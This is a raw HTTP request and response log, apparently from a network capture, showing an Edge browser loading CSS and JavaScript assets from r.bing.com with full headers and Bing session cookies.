cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
ResponseHTTP/2.0 200
content-md5: Twb1SQrgn66TMkCHmLv8IQ==
last-modified: Mon, 15 Aug 2022 22:50:25 GMT
etag: 0x8DA7F108AC445E7
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f9153f1f-a01e-002d-2111-ec5322000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 301
cache-control: public, no-transform, max-age=102920
expires: Fri, 01 Mar 2024 20:07:10 GMT
date: Thu, 29 Feb 2024 15:31:50 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220710.626dc7c
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/WRGhsWGnkf3ko69VafMSpLBwgbk.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
ResponseHTTP/2.0 200
content-type: text/css; charset=utf-8
content-encoding: br
content-md5: OlMqQ8ux819it2Jt7we3gA==
last-modified: Wed, 31 Aug 2022 07:20:22 GMT
etag: 0x8DA8B214463CDB2
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f5260e08-c01e-003d-6203-513331000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=105718
expires: Fri, 01 Mar 2024 20:53:48 GMT
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220710.626dc88
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/vDjLjnEkXEuH2C8u3tT0A004qwQ.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
ResponseHTTP/2.0 200
content-type: text/css; charset=utf-8
content-encoding: br
content-md5: DnViWNsgH/Vlo3SrH5gEzg==
last-modified: Wed, 14 Feb 2024 22:53:57 GMT
etag: 0x8DC2DAFD381775A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: fe088067-401e-0033-52eb-5f1a81000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=82782
expires: Fri, 01 Mar 2024 14:31:32 GMT
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220710.626dc89
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/Y26LIcmRz0EdnBtSjtN2P4pbrp4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: AF62Xzz0LLf+cuj5lM5eHg==
last-modified: Fri, 08 Dec 2023 05:22:25 GMT
etag: 0x8DBF7ADA9D1A3D6
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a6078d7b-e01e-0071-326e-2d067a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 2563
cache-control: public, no-transform, max-age=188644
expires: Sat, 02 Mar 2024 19:55:53 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d8f3
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/R14ozkkie30zM6FSjzwWFp8Ffzk.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: YOn7GivtYV4WtlXuosS/dA==
last-modified: Mon, 11 Dec 2023 09:34:33 GMT
etag: 0x8DBFA2C61D7C171
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 91e593c8-701e-0028-4f7d-5d2482000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=73828
expires: Fri, 01 Mar 2024 12:02:17 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d8f8
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/0qo7e16hAJuKr67fZ-dKtNlvtjg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DA80103F341B76
akamai-grn: 0.a7777b5c.1708758143.12afb927
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: BVVP5iQuH04IBnCWF4qxlw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 65bb1ec7-001e-0050-6260-5b877a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 642
cache-control: public, no-transform, max-age=78854
expires: Fri, 01 Mar 2024 13:26:03 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d8f9
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/9MqrCXB0EVjVIRzDOArDGhu3yeM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Q6WF0xzaJJkdye+SYdYhHw==
last-modified: Wed, 14 Feb 2024 09:46:11 GMT
etag: 0x8DC2D41C722BC0C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7c1ab6e4-901e-0042-35f8-62fcaa000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1043
cache-control: public, no-transform, max-age=313208
expires: Mon, 04 Mar 2024 06:31:57 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d8fa
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/NKlfs_-_Zuwygh1SF6-C9XT2QxM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DA976276EEA14F
akamai-grn: 0.478a4917.1708767807.a2bd126
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: WUS3KRfCTiIzhAYqAhVysQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 49db80e7-501e-00cd-6f74-29d0bb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 4939
cache-control: public, no-transform, max-age=43357
expires: Fri, 01 Mar 2024 03:34:26 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d8fc
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/4qLYPfN0EmVUH2TIgYLmYcXKYtQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: w8DrXgREl1d77JG1lw9tMA==
last-modified: Thu, 06 Apr 2023 01:34:24 GMT
etag: 0x8DB363F0DFEA7E9
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 003188aa-201e-0057-57a7-67eb19000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=48671
expires: Fri, 01 Mar 2024 05:03:00 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d8fd
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/-8B2JlFI9HgFcgp0RGJHcPQD2GM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DB77952723CA1E
akamai-grn: 0.ac777b5c.1709055448.274d05d0
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 8932
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: GYCEGBo6S389D4nnkxV8Zg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9fc28b04-d01e-0045-4721-3f35b2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=106311
expires: Fri, 01 Mar 2024 21:03:40 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d8f7
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/2DP4HPIfaNQ7pkpsKIkpRa3DF6Y.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: f4WmHTaFQ8WEjsZZdp7odA==
last-modified: Fri, 03 Feb 2023 09:53:57 GMT
etag: 0x8DB05CC9182688A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 80ff05c7-a01e-0070-6c15-1f59a6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=145846
expires: Sat, 02 Mar 2024 08:02:35 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d8fb
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/2_T03GKj2lZLGoe1GR3JpyqblCM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: iKVS5r4aw5eMSRQ5gydrOg==
last-modified: Tue, 30 Jan 2024 06:58:21 GMT
etag: 0x8DC2160D8CF9C0F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2f2687c0-801e-0061-68ca-5a6669000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 71035
cache-control: public, no-transform, max-age=234588
expires: Sun, 03 Mar 2024 08:41:37 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d8fe
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/lLk8XmbdNzzlnPRzVzDhaF9yjqw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: l5PXwpOyUFdqY44wmnrCag==
last-modified: Wed, 17 Aug 2022 06:38:42 GMT
etag: 0x8DA801B209CE9AE
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8e92547b-901e-00c2-6ba6-29a6d7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=101725
expires: Fri, 01 Mar 2024 19:47:14 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d8ff
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/mChBxas6km-Qf4z0OFnwyL0X2i4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: ZSvBZ7dH2t2fPagV+JDjfQ==
last-modified: Wed, 28 Feb 2024 05:35:35 GMT
etag: 0x8DC381F166F6EE0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 59f15510-301e-00af-764f-6ab7e7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1233
vary: Accept-Encoding
cache-control: public, no-transform, max-age=340401
expires: Mon, 04 Mar 2024 14:05:10 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d900
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/AFTQBNs7Ze3RPaQB_eH-C3JktUA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: DQ1CFy/kU2nLskYZa3l5nw==
last-modified: Thu, 29 Feb 2024 03:16:29 GMT
etag: 0x8DC38D4D271D16F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f7362dc0-e01e-0015-11d8-6a5299000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.a1777b5c.1709188571.5eb125b
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=399334
expires: Tue, 05 Mar 2024 06:27:23 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d901
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/ascyKFaOzJnUTZ_D-Mv819BZ0Go.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: qR9iUPtDrdrCfrMExl4H0Q==
last-modified: Tue, 30 Jan 2024 19:39:52 GMT
etag: 0x8DC21CB3A8069DB
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3417ab45-401e-000c-76f8-53d222000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=101889
expires: Fri, 01 Mar 2024 19:49:58 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d902
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/Gyuq2bqitqDJM0BeAkbKXGlQXNw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
